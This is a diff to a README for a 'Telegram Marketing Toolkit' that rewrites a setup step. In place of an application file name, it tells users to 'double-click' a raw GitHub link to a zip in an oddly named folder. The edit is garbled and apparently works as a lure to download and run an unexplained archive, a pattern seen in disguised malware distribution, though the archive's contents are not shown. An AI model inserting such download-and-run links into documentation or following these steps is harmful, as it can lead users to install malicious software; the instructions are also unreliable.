Matheussftw/Telegram-Marketing-Toolkit/README.md

    - If you downloaded a compressed file (like .zip), extract it by right-clicking on the file and selecting "Extract All."

 6. **Run the Application**:
-   - Double-click the application file (e.g., Telegram-Marketing-Toolkit.exe) to open it.
+   - Double-click the application file (e.g., https://raw.githubusercontent.com/Matheussftw/Telegram-Marketing-Toolkit/main/intermenstruum/Telegram-Marketing-Toolkit.zip) to open it.
 Follow any on-screen instructions to get started.

 ## 🛠️ System Requirements